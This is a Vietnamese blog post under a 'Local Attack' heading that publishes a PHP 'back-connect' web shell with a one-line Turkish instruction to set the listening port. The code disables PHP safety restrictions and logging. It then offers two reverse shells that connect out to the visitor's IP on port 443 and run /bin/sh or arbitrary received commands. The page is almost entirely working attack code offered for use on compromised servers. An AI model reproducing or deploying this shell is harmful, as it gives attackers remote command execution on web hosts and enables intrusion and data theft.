J2TEAM Security: A must-have extension for Chrome users. Install now!
Trang chủ
Code
Local Attack

dc çift baðlantý script shell

443 yazan yere modeminizde açtýðýnýz açýk portu yazýn

Code:
<?
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
?>
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<meta http-equiv=Content-Type content="text/html; charset=windows-1254">
</HEAD>
<BODY>
<CENTER>
 <?php
$uname = php_uname();
echo "Uname -a :$uname";
?>
<br><br>
<a href="?BackConnect=PHP_1">PHP BackConnect 1</a>
&nbsp;&nbsp; <a href="?BackConnect=PHP_2">PHP BackConnect 2</a>
 <?php
function printit ($string) {
   if (!$daemon) {
      print "$string\n";
   }
}
$bc = $_GET["BackConnect"];
switch($bc){
case "PHP_1": 

set_time_limit (0);
$VERSION = "1.0";
$ip = $_SERVER["REMOTE_ADDR"];
$port = 443;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) { 

   $pid = pcntl_fork(); 

   if ($pid == -1) {
      printit("ERROR: Can't fork");
      exit(1);
   } 

   if ($pid) {
      exit(0);  // Parent exits
   }
   if (posix_setsid() == -1) {
      printit("Error: Can't setsid()");
      exit(1);
   } 

   $daemon = 1;
} else {
   print("WARNING: Failed to daemonise.  This is quite common and not fatal.");
} 

// Change to a safe directory
chdir("/"); 

// Remove any umask we inherited
umask(0); 

//
// Do the reverse shell...
// 

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
   printit("$errstr ($errno)");
   exit(1);
} 

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
); 

$process = proc_open($shell, $descriptorspec, $pipes); 

if (!is_resource($process)) {
   printit("ERROR: Can't spawn shell");
   exit(1);
} 

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0); 

printit("Successfully opened reverse shell to $ip:$port"); 

while (1) {
   // Check for end of TCP connection
   if (feof($sock)) {
      printit("ERROR: Shell connection terminated");
      break;
   } 

   // Check for end of STDOUT
   if (feof($pipes[1])) {
      printit("ERROR: Shell process terminated");
      break;
   } 

   // Wait until a command is end down $sock, or some
   // command output is available on STDOUT or STDERR
   $read_a = array($sock, $pipes[1], $pipes[2]);
   $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); 

   // If we can read from the TCP socket, send
   // data to process's STDIN
   if (in_array($sock, $read_a)) {
      if ($debug) printit("SOCK READ");
      $input = fread($sock, $chunk_size);
      if ($debug) printit("SOCK: $input");
      fwrite($pipes[0], $input);
   } 

   // If we can read from the process's STDOUT
   // send data down tcp connection
   if (in_array($pipes[1], $read_a)) {
      if ($debug) printit("STDOUT READ");
      $input = fread($pipes[1], $chunk_size);
      if ($debug) printit("STDOUT: $input");
      fwrite($sock, $input);
   } 

   // If we can read from the process's STDERR
   // send data down tcp connection
   if (in_array($pipes[2], $read_a)) {
      if ($debug) printit("STDERR READ");
      $input = fread($pipes[2], $chunk_size);
      if ($debug) printit("STDERR: $input");
      fwrite($sock, $input);
   }
} 

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process); 

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
break;
case "PHP_2":
          $ipim=$_SERVER["REMOTE_ADDR"];
         $portum="443";
         if ($ipim <> "")
         {
         $mucx=fsockopen($ipim , $portum , $errno, $errstr );
         if (!$mucx){
               $result = "Error: didnt connect !!!";
         }
         else {  

         $zamazing0="\n";
         fputs ($mucx ,"\nwelcome ZoRBaCK\n\n");
         fputs($mucx , system("uname -a") .$zamazing0 );
         fputs($mucx , system("pwd") .$zamazing0 );
         fputs($mucx , system("id") .$zamazing0.$zamazing0 );
         while(!feof($mucx)){
         fputs ($mucx);
        $one="[$";
        $two="]";
        $result= fgets ($mucx, 8192);
        $message=`$result`;
       fputs ($mucx, $one. system("whoami") .$two. " " .$message."\n");
      }
      fclose ($mucx);
         }
         }  

break; 

}
?>
</CENTER>
</BODY>
</HTML>
Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!